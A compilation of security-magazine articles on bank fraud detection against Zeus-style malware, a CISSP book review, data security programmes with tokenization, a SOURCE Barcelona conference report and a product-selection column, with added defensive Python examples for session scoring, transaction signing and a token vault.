Strong authentication - Recognizing that not all transactions are equivalent, organizations should deploy a versatile authentication platform that supports a broad range of authenticators, so that the strength of the authentication can be matched to the risk of the transaction. There is a wide range of options available on the market today, including traditional physical options like OTP tokens, grid cards and smart cards.

While these solutions on their own are not 100% effective against attacks like Man-in-the-Browser, which ride on a session the user has legitimately authenticated, they do protect against many attacks, such as the theft and replay of static passwords, and when deployed in conjunction with fraud detection they increase the protection for sensitive transactions.

Behavioral and transactional fraud monitoring - This server-side monitoring of a user's movement through a banking web site, including the transaction execution steps and the steps leading there, gives financial institutions the flexibility to adapt to constantly evolving malware features and helps them detect suspicious patterns of activity.

Modern fraud detection solutions offer organizations the ability to detect and defend against fraud in real time, across applications and channels, a critical capability given how fast criminals move.
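As an added illustration of the behavioral monitoring described here and of the earlier point about navigation patterns and browsing speed, the following Python example is not part of the original article or of any Entrust product. It learns a per-user baseline (which page-to-page transitions the user has made before, and the typical seconds per step) from known-good sessions and scores a new session against it; the log lines, page paths and the user "alice" are constructed for the example, and the thresholds are assumptions.

```python
"""Server-side behavioural session scoring (added example, not the article's
or Entrust's code). Log lines are 'ISO-timestamp user=<id> sid=<session>
page=<path>'. All data below is constructed for the example."""
from datetime import datetime
from statistics import median

# Constructed known-good sessions: how 'alice' normally navigates.
BASELINE_LOG = """\
2010-10-04T09:00:00 user=alice sid=1 page=/login
2010-10-04T09:00:21 user=alice sid=1 page=/accounts
2010-10-04T09:00:58 user=alice sid=1 page=/accounts/123/statement
2010-10-04T09:02:10 user=alice sid=1 page=/transfer/new
2010-10-04T09:03:05 user=alice sid=1 page=/transfer/review
2010-10-04T09:03:40 user=alice sid=1 page=/transfer/confirm
2010-10-04T09:03:55 user=alice sid=1 page=/logout
2010-10-11T18:30:00 user=alice sid=2 page=/login
2010-10-11T18:30:15 user=alice sid=2 page=/accounts
2010-10-11T18:31:02 user=alice sid=2 page=/accounts/123/statement
2010-10-11T18:32:30 user=alice sid=2 page=/logout
"""

# Constructed suspect session: a transfer fired within seconds of login,
# skipping the pages a person passes through (the Man-in-the-Browser pattern).
SUSPECT_LOG = """\
2010-11-02T09:14:00 user=alice sid=9 page=/login
2010-11-02T09:14:02 user=alice sid=9 page=/transfer/new
2010-11-02T09:14:03 user=alice sid=9 page=/transfer/confirm
2010-11-02T09:14:04 user=alice sid=9 page=/accounts
"""


def parse_log(text):
    """Group log lines into sessions: {sid: [(datetime, page), ...]}."""
    sessions = {}
    for line in text.splitlines():
        ts, *fields = line.split()
        kv = dict(f.split("=", 1) for f in fields)
        sessions.setdefault(kv["sid"], []).append((datetime.fromisoformat(ts), kv["page"]))
    return sessions


def build_profile(sessions):
    """Learn the transitions a user has made and the median seconds per step."""
    transitions, gaps = set(), []
    for events in sessions.values():
        for (t0, p0), (t1, p1) in zip(events, events[1:]):
            transitions.add((p0, p1))
            gaps.append((t1 - t0).total_seconds())
    return {"transitions": transitions, "median_gap": median(gaps)}


def score_session(events, profile, fast_factor=10.0):
    """Return (score, reasons). Every anomaly signal adds to the score:
    a transition never seen for this user, a step taken far faster than the
    user's median, and a transfer confirmed without the review page."""
    score, reasons = 0, []
    for (t0, p0), (t1, p1) in zip(events, events[1:]):
        gap = (t1 - t0).total_seconds()
        if (p0, p1) not in profile["transitions"]:
            score += 1
            reasons.append(f"unseen transition {p0} -> {p1}")
        if gap * fast_factor < profile["median_gap"]:
            score += 1
            reasons.append(f"{p0} -> {p1} in {gap:.0f}s (baseline median {profile['median_gap']:.0f}s)")
    pages = [p for _, p in events]
    if "/transfer/confirm" in pages and "/transfer/review" not in pages:
        score += 2
        reasons.append("transfer confirmed without the review step")
    return score, reasons


def flag(events, profile, threshold=3):
    """True when the session should be held for review before money moves."""
    score, _ = score_session(events, profile)
    return score >= threshold


if __name__ == "__main__":
    profile = build_profile(parse_log(BASELINE_LOG))
    for sid, events in parse_log(SUSPECT_LOG).items():
        score, why = score_session(events, profile)
        print(f"session {sid}: score={score} flagged={score >= 3}")
        for reason in why:
            print("  -", reason)
```

The point of scoring the navigation rather than only the final transfer is that the suspect session is flagged on its second page, before the confirm step is reached, which is where a real-time system would interpose a challenge or hold. A production profile would be built from many sessions and would age out old transitions; the single-user, two-session baseline here only shows the mechanism.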

Out-of-band transaction verification and signature techniques on a mobile application - This technique leverages devices such as mobile phones that end users already carry, and enables them to review and verify transaction details outside the influence of malware on the user's PC. Because the phone shows the transaction as the bank actually received it, a payee or amount altered in the browser is visible to the user, and a transaction the user does not sign on the phone is not executed.
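The following Python example is an added illustration of out-of-band transaction verification; it is not code from the article or from Entrust. It assumes a per-device symmetric HMAC key shared between the bank and the enrolled phone at enrolment (a deployment could use a per-device asymmetric key instead), and all users, payees, account identifiers and amounts are constructed. The bank signs nothing itself: it executes only a transaction whose details, as the bank received them, carry a signature from the phone, and it refuses a replayed approval.

```python
"""Out-of-band transaction verification with a transaction signature.
Added example, not the article's or Entrust's code. Assumption: the bank and
the enrolled phone share a per-device HMAC key; every name and value below is
constructed."""
import hashlib
import hmac
import json
import os


def canonical(tx):
    """Stable byte encoding of exactly the fields the user is asked to approve."""
    fields = {k: tx[k] for k in ("payee", "account", "amount", "nonce")}
    return json.dumps(fields, sort_keys=True, separators=(",", ":")).encode()


class Bank:
    def __init__(self):
        self.device_keys = {}   # user -> key shared with that user's enrolled phone
        self.used_nonces = set()

    def enrol(self, user):
        key = os.urandom(32)
        self.device_keys[user] = key
        return key              # provisioned to the phone out of band at enrolment

    def start_transaction(self, user, payee, account, amount):
        """Called with whatever the browser submitted (possibly rewritten by a MitB)."""
        return {"user": user, "payee": payee, "account": account,
                "amount": amount, "nonce": os.urandom(8).hex()}

    def execute(self, tx, signature):
        """Execute only a transaction the phone signed, and only once."""
        key = self.device_keys[tx["user"]]
        expected = hmac.new(key, canonical(tx), hashlib.sha256).hexdigest()
        if signature is None or not hmac.compare_digest(expected, signature):
            return "REJECTED: no valid transaction signature"
        if tx["nonce"] in self.used_nonces:
            return "REJECTED: replayed approval"
        self.used_nonces.add(tx["nonce"])
        return f"EXECUTED: {tx['amount']} to {tx['payee']} ({tx['account']})"


class Phone:
    """The mobile app: shows the bank's view of the transaction and signs it
    only when the user confirms it matches what they meant to do."""

    def __init__(self, key):
        self.key = key

    def approve(self, tx, intended):
        shown = {k: tx[k] for k in ("payee", "account", "amount")}
        if shown != intended:
            return None         # user sees 'Pay Mallory 5000' instead of 'Pay Alice 100'
        return hmac.new(self.key, canonical(tx), hashlib.sha256).hexdigest()


def scenario(tampered):
    """User intends Alice/100; with tampered=True a MitB rewrites the request."""
    bank = Bank()
    phone = Phone(bank.enrol("bob"))
    intended = {"payee": "Alice", "account": "GB11-0001", "amount": "100.00"}
    submitted = ({"payee": "Mallory", "account": "GB99-6666", "amount": "5000.00"}
                 if tampered else dict(intended))
    tx = bank.start_transaction("bob", **submitted)
    sig = phone.approve(tx, intended)
    return bank.execute(tx, sig)


def replay_attack():
    """A captured signature neither transfers to a different transaction
    nor authorises the same transaction a second time."""
    bank = Bank()
    phone = Phone(bank.enrol("bob"))
    intended = {"payee": "Alice", "account": "GB11-0001", "amount": "100.00"}
    good = bank.start_transaction("bob", **intended)
    sig = phone.approve(good, intended)
    assert bank.execute(good, sig).startswith("EXECUTED")
    forged = dict(good, payee="Mallory", account="GB99-6666", amount="5000.00")
    return bank.execute(forged, sig), bank.execute(good, sig)


if __name__ == "__main__":
    print("honest browser :", scenario(tampered=False))
    print("MitB browser   :", scenario(tampered=True))
    print("forged/replayed:", replay_attack())
```

This is what distinguishes transaction signing from an out-of-band OTP: an OTP typed into the browser would have been accepted for the Mallory transaction just as readily, because nothing ties it to the payee and amount.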

In a case study published earlier this year, Gartner detailed how one bank implemented a fraud detection solution that captures, monitors and analyses user session activity, distinguishing between malware and legitimate user activity.

In this report Gartner described how this bank saved $1 million over an 18-month period by implementing this solution, stopping more than 40 attempted account takeovers by Zeus malware attacks in 2009 alone. (See Gartner Research Note, Case Study: Bank Defeats Attempted Zeus Malware Raids of Business Accounts, March 2010.)



While financial institutions have numerous options for addressing online fraud, their implementation of these solutions has been slow.

A solution that detects fraudulent activity in real time and monitors user behavior offers an effective approach to combating some of the latest malware attacks, preventing financial loss for banks and businesses.

This use of behavioral and transactional fraud monitoring should be complemented by strong two-factor authentication and out-of-band transaction verification and signature for an effective layered defense.



Mike Byrnes is a Product Manager at Entrust (www.entrust.com). He has more than 20 years' experience in product management with a focus on internet security and business communication systems. He is currently responsible for driving the Fraud Detection solutions portfolio at Entrust, working with top financial institutions around the globe.
Book review
CISSP Study Guide

by Zeljka Zorz

Authors: Eric Conrad, Seth Misenar and Joshua Feldman | Pages: 592 | Publisher: Syngress



The title of the book is self-explanatory: this is a study guide for all of you out there who aspire to become a Certified Information Systems Security Professional.

Mixing facts, knowledge and experience, the authors aimed at relaying to you every detail they think important when tackling the colossal task of studying for this demanding exam.

About the authors

Eric Conrad is a SANS Certified Instructor and the president of Backshore Communications, a company focusing on intrusion detection, incident handling, information warfare and penetration testing.

Seth Misenar is also a SANS Certified Instructor and serves as lead consultant for and founder of Context Security. He teaches a variety of courses for the SANS Institute, including the CISSP course.

Joshua Feldman is a contractor working for the DoD's Information Systems Agency. Before that, he spent time as an IT security engineer working for the Department of State, travelling around the world and conducting security assessments of U.S. embassies.

All three are CISSPs.

Inside the book

The book begins with an introductory chapter in which the authors explain that the book was born out of real-world instruction and experience, and offer some good advice on how to use it successfully and how to prepare for and take the exam.

The ten chapters that follow cover the following subjects: information security governance and risk management, access control, cryptography, physical security, security architecture and design, business continuity and disaster recovery planning, telecommunication and network security, application development security, operations security, and legal regulations, investigations and compliance.

Every chapter begins with a short list of the exam objectives covered in it and points out and defines the most important terms. After a short introduction, cornerstone information security concepts are introduced, and the authors make sure that you understand that without being completely familiar with them, you will not be able to pass the exam.

Throughout the chapters, text boxes contain real-world examples and exam warnings with hints about what things you really need to remember, what information you must not mix up, and what the exam questions are really aiming for in particular cases.

There are also notes that provide links to material not covered in the book but which must be learned nonetheless, or things to think about. Every chapter finishes with a short summary of the exam objectives and a self test consisting of 15 questions of the kind that could come up in the exam.

Final thoughts 

Perhaps you will look at the number of pages this book has and think that this amount is nothing when compared with some other books designed to teach you all you need to know to become a CISSP, but don't be fooled.

The authors have made it their business to gather all the needed knowledge and to present it in an extremely concise, straightforward manner, and to give you practical hints that could really help jog your memory when you sit down to take the test.



Zeljka Zorz is the News Editor for Help Net Security and (IN)SECURE Magazine. 
Data security programs encompass processes, people, technology

by Abir Thakurta

A thorough examination and understanding of the business processes and people affected by a new data security program, along with selecting the right technology, are the building blocks for a successful outcome.



Organizations embrace data security for a variety of reasons, but more often than not it is in response to a data security mandate (like the PCI DSS) or a privacy law (like the Massachusetts 201 CMR 17).

Far too often, the initiative is defined simply as "an encryption project" or "a tokenization project". Such labels undermine the value of establishing an effective data security program that goes beyond compliance to ensure true data protection, day in and day out, throughout the extended enterprise.

When a data security initiative is assigned to the IT department, it is often approached like any other IT project.

Yet a data security project is very different from a traditional IT project. Instead of building systems, implementing solutions and customizing software to meet business needs, a data security project is about introducing data security into existing business systems and implementing technologies that reduce risk within the organization. A successful data security program balances the need for sharing data with that of restricting data access to remediate security gaps.

Successful data security projects begin with an assessment of the current state of data security within an organization. This includes fully understanding the processes and people that rely on sensitive and confidential information to perform business functions, followed by an exploration of available technologies.

First things first: Key data security implementation questions

Answering the following questions prior to implementation will provide a solid foundation for developing a successful data security program:
• What data requires protection?

• What data is unnecessary? 

• What data should be segregated? 

• Who currently has access to sensitive data? Do they really need access? 

• Who will require access to sensitive data in the future? 

• Will a data vault reduce the data footprint? 

• Can the business systems work with encrypted data? 

• Can the business systems work with surrogate (tokenized) data? 

• Will systems require any modification to work with protected data? 

• Will performance be optimal to support business needs? 

• Can a data security framework be built to support the business as a service? 

• Will data tokenization meet business needs? 

• Will introducing tokenization or encryption technology reduce the risk of data exposure? 



Data security implementation challenges 

Organizations typically experience three types of challenges when implementing a new data security program: process challenges, people challenges and technology challenges.

Challenge #1: Processes 

The most common process challenges that organizations encounter are getting a handle on where sensitive data exists throughout the enterprise; identifying which business processes use sensitive data and evaluating whether surrogate data can be substituted for sensitive information; and defining a data protection strategy.

1. Know the sensitive information footprint. Many organizations do not have a data classification program or know where their sensitive information resides. The absence of a holistic picture results in islands of data protection that can be challenging to manage and standardize. It also increases the cost of ongoing compliance and management of these solutions. It is vital to generate a sensitive information footprint so that an appropriate data protection strategy can be defined and applied. Identify business processes that will be impacted as a part of data remediation, such as the payment process, the order-to-cash process, the procure-to-pay process, etc. This exercise has the added value of revealing the people who will be impacted by the new program and the process owners. Process owners need to be brought into the data security program early to collaborate on how to incorporate data remediation techniques like encryption or tokenization with the least disruption.

2. Identify aspects of a business process that can function with surrogate data. Working with the process owner and other members of the cross-functional team, identify aspects of the process that can be handled with encrypted or surrogate data. Empirical evidence based on past experience suggests that 60 to 70 percent of activities related to many management, operational and supporting processes do not require sensitive data. In these instances, surrogate data, or tokens, can be used. Although introducing changes to existing processes and asking business owners to work with surrogate data can be challenging, the benefits outweigh any initial issues. For example, substituting surrogate data for credit card numbers can take applications, databases and systems out of scope for Payment Card Industry Data Security Standard (PCI DSS) audits, reducing the cost of annual audits. That reduction only holds for systems that never receive the real card number and cannot obtain it from the token; the tokenization system itself, and anything able to de-tokenize, remains in scope. Typically, the output of this step is a process deliverable in the form of a Process Flow Diagram.
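As an added illustration of working with surrogate data, the following Python example is not code from the article or from nuBridges. It models a token vault: a card number is replaced by a token of the same length that keeps the last four digits, so an order-to-cash or support process that only needs "card ending 1111" works on the token alone, while only the vault holds the mapping and only callers it recognises as privileged may reverse it. The card number is the standard Visa test number, the caller names are constructed, and the design choice of rejecting any candidate token that itself passes the Luhn check (so a token can never be mistaken for a real card number) is an assumption of this example, not something the article specifies.

```python
"""Token vault for card numbers (added example; not the article's or
nuBridges' code). Constructed data throughout; the card number is the
standard test number 4111 1111 1111 1111."""
import secrets


def luhn_ok(digits):
    """Luhn check-digit validation, as used for card numbers."""
    total = 0
    for i, d in enumerate(reversed(digits)):
        n = int(d)
        if i % 2 == 1:          # every second digit from the right is doubled
            n *= 2
            if n > 9:
                n -= 9
        total += n
    return total % 10 == 0


class TokenVault:
    """The one place the real PAN lives; everything else sees tokens."""

    def __init__(self, privileged_users):
        self._by_pan = {}                   # PAN -> token
        self._by_token = {}                 # token -> PAN
        self._privileged = set(privileged_users)
        self.audit = []                     # who reversed a token, and who was refused

    def tokenize(self, pan):
        pan = pan.replace(" ", "")
        if not (pan.isdigit() and 13 <= len(pan) <= 19 and luhn_ok(pan)):
            raise ValueError("not a valid PAN")
        if pan in self._by_pan:
            return self._by_pan[pan]        # same card -> same token, so processes can correlate
        while True:
            # Random digits with the last four kept. Assumption of this example:
            # a candidate that is itself Luhn-valid is rejected, so a token can
            # never be mistaken for a real card number.
            body = "".join(str(secrets.randbelow(10)) for _ in range(len(pan) - 4))
            token = body + pan[-4:]
            if not luhn_ok(token) and token not in self._by_token:
                break
        self._by_pan[pan] = token
        self._by_token[token] = pan
        return token

    def detokenize(self, token, caller):
        """Only the few callers that settle payments may recover the PAN."""
        if caller not in self._privileged:
            self.audit.append(f"DENIED detokenize by {caller}")
            raise PermissionError(f"{caller} is not a privileged user")
        self.audit.append(f"detokenize by {caller}")
        return self._by_token[token]


def last_four(token):
    """What a support agent or a report needs, answered from the token alone."""
    return token[-4:]


if __name__ == "__main__":
    vault = TokenVault(privileged_users={"payments-service"})
    token = vault.tokenize("4111 1111 1111 1111")
    order = {"order_id": 1001, "card": token}   # order system stores only the token
    print("token stored with order:", order["card"], "ends in", last_four(order["card"]))
    print("settlement sees:", vault.detokenize(token, caller="payments-service"))
    try:
        vault.detokenize(token, caller="support-agent")
    except PermissionError as e:
        print("support desk:", e)
    print("audit:", vault.audit)
```

The order system, the reporting database and the support desk in this model never handle a card number, which is the property that takes them out of PCI DSS scope; the vault and the settlement service, which can reverse the token, stay in scope and are where the least-privilege rules of the next section apply.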

3. Define a data protection strategy. Traditionally, organizations have viewed security as network or perimeter security. With the proliferation of internal breaches, organizations are beginning to understand the need to protect data at the source. Tactical fixes like encrypting data in one database, without developing an enterprise data protection strategy, can cause issues in the long run. It's important to develop a data protection strategy that aligns with the business needs before implementations are conducted.
Challenge #2: People

One of the most challenging aspects of rolling out a new data security program is handling objections from the people who are impacted by new policies. To some employees, no longer having the ability to work with sensitive data is akin to having privileges taken away.

In response, some may decide to employ workarounds that increase the risk of data breach or data leakage. For example, an employee might access the sensitive data and reveal it to others inside or outside the organization by emailing it or just writing it on a piece of paper.

Therefore, it is imperative to prepare those who will be impacted through open communication, data security training and ongoing education to prevent unauthorized access, use, misuse, disclosure, destruction, modification or disruption of data. Here is a quick overview of a proven approach:

1. Begin at the top. As with any initiative, executive sponsorship is important for a data security program. It is imperative that the message comes from the top. Getting the CIO or CFO engaged early in the project is important, but this should happen once the process and technology challenges have been identified, so that the sponsor is presented with the full scope of the program.

2. Identify people who have access to sensitive data. Working with the process deliverable, identify people (and their activities) that have access to sensitive data. Putting together a stakeholder accountability matrix will help define who is responsible for handling sensitive data and who could work just as effectively with an encrypted or a surrogate value.

Pay more attention to people who will not have access to sensitive data when the data protection program goes into effect.

3. Develop a category of users called "Privileged Users." Anyone who will continue to work with locked-down data after the new data security program is in place becomes a "privileged user." Obtaining a "privileged user" credential should require a set of criteria to be met, including establishing ways that employees can be granted this designation and under which circumstances privileges can be revoked. Applying the principle of least privilege to users accessing sensitive data should help create a defense-in-depth strategy that can work to counter threats.

4. Incorporate data security into the security policy. Adding a data security component to the security policy helps formalize the program. Include a data classification program that has been designed to support the "need to know" principle. This also allows users to be educated on the different data types (confidential, sensitive, restricted, public, etc.) within the organization.

5. Add an acceptable data use policy to the organization's acceptable use policy. This will ensure that privileged users are bound by governing rules and sanctions around the management and processing of data. It also creates a policy within the organization that can be regularly enforced and audited. In the event that a policy violation occurs, the organization can appropriately withdraw access to data.

6. Educate and train. Raising awareness of privacy issues within the organization is an important step toward the execution of a successful data protection program. This should be handled by educating stakeholders on why reducing risk is important to the business.

Awareness training educates both privileged and business users on the appropriate use, protection and security of sensitive data within the organization.

It also helps people understand their individual user responsibilities around data privacy, such as the confidentiality, integrity and availability of data assets. Training should enhance user awareness, increase security, achieve compliance and improve productivity for the business. Introduce the data security program using internal communications and promotions, and consider hiring a professional trainer.

New employee Security Awareness Training programs and periodic refresher courses can also be administered online using third-party professional services.
Challenge #3: Technology

The third major challenge of implementing a successful data protection program is selecting the right technology for the various types of sensitive data that need to be protected. This is especially critical for PCI DSS compliance, where stored cardholder data must be rendered unreadable, most commonly through encryption, and the keys used must be managed and protected.

Packaged data security solutions for encryption, tokenization and key management offered by specialized, best-of-breed data security suppliers will provide greater value and future-proofing than custom-made or internally developed solutions.

The biggest benefit of using commercial off-the-shelf (COTS) products is having the supplier maintain the products for ongoing compliance. Custom-made applications will always be open to scrutiny during audits and require additional investment to maintain compliance.

COTS solutions should support open standards for interoperability, another future-proofing requirement. Technology solutions built on open standards like web services and the Java Cryptography Extension (JCE) can be integrated with similar conforming technology in an existing IT infrastructure. Packaged solution providers must assure that their solutions encompass new standards as they emerge and become accepted by the industry.

Delegating the monitoring and enablement of new standards is an important part of the value proposition. For example, there are several initiatives underway to establish standards for key management. It will be a while before they solidify, but it's important to select a solution supplier that has demonstrated the ability and desire to support standards.

Solutions must be designed for architectural flexibility and scalability to accommodate future needs, such as new personally identifiable information (PII) use cases (even if they are not part of the original technology justification) as well as new standards.

In addition to future-proofing your data security technologies by selecting the right technology and vendor partner, most organizations also face these technology challenges:

1. Refining data models. Typically, organizations try to protect data by encrypting the data set wherever it resides within the organization. However, a data protection strategy does not always require encryption. It could be as simple as getting rid of the data. That can be achieved by refining data models, consolidating data sets, aggregating data and replacing data with surrogate data.

Data models can be refined and data sets can be optimized without impacting business systems. Consider using a third-party data security expert or relying on a trusted technology vendor for assistance.

2. Optimizing systems for performance with encryption. Encryption is performance intensive: every read of a protected field costs a decryption, and a column stored encrypted can no longer be indexed, sorted or searched by range in the database as it was before. As such, performance optimization is very important. Every application that works with encrypted data has to be reviewed, tested and performance tuned. This is handled during the implementation project.

3. Data migration. One of the biggest challenges for an organization pursuing data protection is to establish a data migration strategy. This is important for business continuity because the transition of systems that contain sensitive data to a protected state needs to be analyzed, designed, tested and executed.

Additionally, the order in which business systems across the enterprise are migrated to encryption or tokenization has to be analyzed and accounted for. The initial bulk encryption or tokenization of data that already exists is an important aspect of the design that is often neglected.

4. Build flexibility into the overall data protection solution to anticipate future data protection needs. Often customers request tactical fixes to protect data of a particular type. However, working with the assumption that any data set can be protected by the solution is a key aspect of data protection design. This ensures that the data protection solution can be leveraged in the future to protect additional data sets, thus maximizing the investment made.
Six key steps to a successful data security program

Deploying an enterprise-wide data protection strategy in a heterogeneous environment requires a proven methodology for success. Real-world experience indicates that the following six steps are critical to a successful data security program:

1. Classify sensitive information through a data management and classification program. In other words, identify which data needs to be protected.

2. Develop a sensitive information footprint within the enterprise. Identify where sensitive data gets acquired, processed, viewed, modified, updated, added, transmitted, stored, archived and destroyed. A sensitive information flow with impacted systems can be very beneficial in this stage.

3. Design a data protection strategy that balances the need for access to information by the business with the requirement to protect it, with the aim being to minimize exposure and overall risk. This strategy usually employs a combination of one or more of the following remediation techniques:

a. Get rid of sensitive data that is not needed to run the business. For example, it may be determined that storing credit card numbers is not necessary.

b. Define a policy of least privilege and need to know. Studies indicate 60 to 70 percent of business processes and associated users may not need the sensitive data.

c. Segregate the data using a Chinese wall to reduce the risk of data inference.

d. Rely on traditional methods of network segmentation and defense in depth to prevent traditional hacks.

e. Prevent data leaks and data diddling.

f. Leverage the latest innovations in data protection, including pervasive encryption, tokenization and key management.

4. Execute data protection strategies in phases to transition from a state of high exposure to one of controlled risk, and potentially to compliance with mandates like PCI DSS.

5. Educate employees and management on the benefits of a sound data protection strategy as a part of the organization's change management process.

6. Maintain an ongoing data security program that ensures continuous protection and compliance throughout the extended enterprise.

Key data security program success criteria

Most data protection projects involve multiple teams and require collaboration among different business functions, most often IT, security, compliance and finance. While each business function has its own performance metrics, a set of key success criteria for data security projects has emerged:

• Impact to business

• Reduction in the sensitive data footprint

• Managing the cost of ongoing compliance (for mandate-driven projects)

• Ease of implementation of the data protection strategy

• Ease of integration with existing business systems

You don't have to do it all: Seek vendor experience

Implementing a data security program is a complex assignment encompassing processes, people and technology. It requires a comprehensive upfront assessment of the organization's entire data security landscape and may lead to subtle changes to business processes that affect how employees do their jobs. It also requires a thorough examination of the available technologies and a determination of which ones will most effectively protect data, depending on how it's used and where. In addition, many organizations must also comply with one or more data security mandates or privacy laws. Such a vast and highly important project can often benefit from outside assistance from a data security implementation specialist. Working with an experienced data security vendor partner leverages the wealth of experience gained only by continually aiding organizations across industries to implement data protection programs that meet a variety of objectives.



Data security expert Abir Thakurta is senior director of Professional Services for nuBridges (www.nubridges.com), where he plays a leading role in ensuring customer satisfaction through successful implementations of the company's solutions. He can be reached at athakurta@nubridges.com.
We spent four fantastic days in Barcelona attending our first SOURCE Conference. Apart from the one in Barcelona, there are two more affiliated SOURCE conferences that will be held throughout the year: the "original" one in Boston and the one they will be premiering mid-June next year in Seattle.



What I really like about SOURCE is that it caters to a group of some 80 people, which makes it very easy to meet with and talk to every participant and speaker. The majority of the attendees and lecturers are well known in the information security community: they are speakers at major industry events or influential researchers you are definitely familiar with via their blogs or Twitter streams.

The best way to describe the SOURCE crowd is as one big family, and this is surely one of the reasons for the success of this event. People spend whole days together, sharing rented apartments, attending the event, and enjoying tapas and sangria in the evenings.

Stacy Thayer, the alpha and omega of the conference, chose Barcelona because she really liked the vibrant nature of the city and its beautiful architecture, and because there weren't any security events held in this city. The conference will be getting some competition this year, though, as Black Hat, after years of doing the show in Amsterdam, switched locations and will now be held in Barcelona too.

SOURCE Conference is held at the MNAC (Museu Nacional d'Art de Catalunya), an astonishingly beautiful building located just north of Plaça d'Espanya, on the hills of Montjuïc. The conference venue is located in the west part of the giant hall and consists of two smaller auditoriums, one per track.

Over 70 talks were submitted to the organizing board and about 22 of them passed the selection. The selected speakers were a global bunch of security geeks.

The event started at 10 am, one hour later than the usual start of the Boston event or the 2009 Barcelona event. Stacy mentioned this was a result of attendee feedback from the past year, and I am all for it: Barcelona lives and breathes a bit differently, and it is not unusual to go to dinner at around 10 pm.

This year's SOURCE in Barcelona was opened by PricewaterhouseCoopers' information security lead William Beer with a presentation based on a report commissioned by the UK Government Technology Strategy Board. Mr. Beer discussed the drivers that will influence the state of information security until 2020 and beyond.

I attended eight lectures, so I'll share some information on them. The keynote was followed by a joint presentation by Verizon Business' Alex Hutton and PayPal's Allison Miller, in which they shared their experience with simple but effective approaches to threat modeling.




Brian Honan from Ireland delivered a speech on setting up a CSIRT, during which he walked us through a scenario of organizing a CERT. We recently did a Q&A with Brian on this topic, so I was really interested in hearing more details. My hat off to him and his team; it was certainly tough to set everything up, especially because they have no government backing. Setting it up was a formidable task, but running daily operations on a volunteer basis is awe-inspiring.

Jayson Street, author of "Dissecting the Hack: The F0rb1dd3n Network" and co-founder of ExcaliburCon, the first information security (hacking) event to be held in China, gave a dynamic speech on social engineering.

His take on it was a combination of historical pre-social-engineering "attacks", including Egypt's Amenhotep III and the popular Trojan horse story, and practical variations on the methods he is using right now.

He also shared some general views on what social engineering should focus on in different parts of the world.
Brian Honan during his presentation.



The first day ended with a presentation by Barnaby Jack on "jackpotting" ATMs. He managed to hack some ATMs and practically turned them into personal cash dispensers. I missed the presentation when he gave it during Black Hat, so it was nice to see it now. At Black Hat he managed to get the machines transported to the conference venue (about nine hours of driving), but in Barcelona we used the powers of live streaming to witness the effects of his hack.

He was running the code remotely from Barcelona and we had a video feed to show the results from the United States' East Coast. As a side note, in Las Vegas he didn't have the statistics for the number of ATMs of this type in the U.S.A., but now he shared the figures: Tranax (the manufacturer of the ATMs in question) has a 30% share of around 450,000 ATMs in the United States.

The second day started with a three-hour long panel on anti-virus testing methods and procedures. On the first day we had talked with the panel moderator David Sancho and had planned some good questions for the panel, but unfortunately we had just found out that the flight to BruCON was canceled, so we had to spend the time checking for alternatives and possible workarounds.

Andrew Hay and Chris Nickerson spent 45 minutes entertaining the attendees with a very interesting take on creating a dialogue between tech people (hackers) and the decision makers. They touched on a number of scenarios we come across often, and each took his side and discussed it from either a hacker (Chris) or business (Andrew) perspective. This was surely one of the best speeches at SOURCE Barcelona.




Moving back to the security and tech auditorium, I attended the Bruce Oliveira and Jibran Ilyas talk, where these Trustwave guys shared their views on the black hats they come across in their line of work (penetration testing and forensics). A heated debate started during the talk about whether these particular black hats were, in fact, just script kiddies.

The final lecture of this year's Barcelona event was held by two local "boys" - Vicente Diaz and David Barroso from S21Sec. They did a thorough analysis of the popular underground forum Carders.cc - from its golden days after a competing forum went offline, until its demise after the server was broken into and all the information it contained was shared via RapidShare.

As far as I'm concerned, the speakers were interesting, the possibilities for networking were great, the atmosphere was relaxed, and I can't wait for the 2011 event!




Wireshark (www.net-security.org/software.php?id=735)

Wireshark is the world's foremost network protocol analyzer, and is the de facto standard across many industries and educational institutions.

Master Voyager (www.net-security.org/software.php?id=730)

Master Voyager is especially designed to create protected DVD/CD discs and USB memory sticks. It creates protected areas on the media, and a password must be entered to see the protected contents. In addition, every protected disc or USB stick is fully autonomous and does not require any special software to be installed on your PC.

Total Privacy (www.net-security.org/software.php?id=729)

Total Privacy can clean your browser's cache, cookies, web form data, entries in your recent documents history, recent applications history, find files history, your temporary files and recycle bin, clean recent documents lists for popular applications, recover hard disk space, and much more.

File Encryption XP (www.net-security.org/software.php?id=728)

With File Encryption XP, you can encrypt files of any type, including Microsoft Word, Excel and PowerPoint documents. It protects information against being viewed or modified without your authorization.
It's hard to believe another season of NCAA college basketball is upon us. Even before the first regular season tip-off, fans of the game are already laying bets as to who will be among the best teams in the nation. Most of the money is placed on the more well-known schools from the larger conferences.



However, if the past showed us anything, it is that the "smart" bets are not always the ones that will earn you money. Recent history has seen a significant rise by smaller teams making it to the Top 25 rankings.

Not that long ago, underrated George Mason University from the lesser-regarded Colonial Athletic Association got all the way to the coveted Final Four, despite going up against powerhouse squads like the Universities of Connecticut, Michigan State and North Carolina - teams that possessed far bigger budgets, players and supporters.

Even for those who don't follow it, college basketball can be used as a perfect illustration of one basic truth - that bigger and better known entities aren't necessarily the best ones. CSOs can learn a good lesson from this - which is that implementing the most popular policies, practices and systems will not, in and of themselves, make a network any more secure or the potential for cyber intrusions smaller.

Keeping data protected and a high level of productivity requires due care and consideration not for what's easy, but for what's most effective and beneficial to an organization's specific needs.

Before the next tournament begins, I'd recommend that IT security managers re-evaluate their product requirements based on the following criteria:
1. Are the basics covered?

Too often, a new system is procured and implemented because of what outsiders are pushing as a response to what's being reported on the six o'clock news, but without much regard to the probability that that issue will affect the company. Furthermore, reacting to the latest threat without having a solid security foundation in place will only lead to more problems. CIOs would be better served by ensuring that they've got fundamental protection in the forms of secure VPN access, unified threat management and email gateway systems before adding other layers to the mix. Doing otherwise would be akin to a college basketball team taking the field without a shooter; the game will be lost if no one on the court can make a play.

2. Are your efforts coordinated?

While security IT folks are the natural choice to lead efforts, they will not be the only ones involved. The ideal situation would be for all departments to have a designated representative who would be responsible for coordinating efforts within and outside their area. Think of it this way - a point guard may set up a play to drive to one side of the basket, but that's only going to work if the forward knows what to do to get open, catch the pass and then lay it in for two points.

Herein lies the challenge for any company - policies and practices will often transcend areas of responsibilities for individuals and managers, and failure to make security practices seamless across these lines will create vulnerabilities that hackers seek to exploit.

3. Will the products work for you?

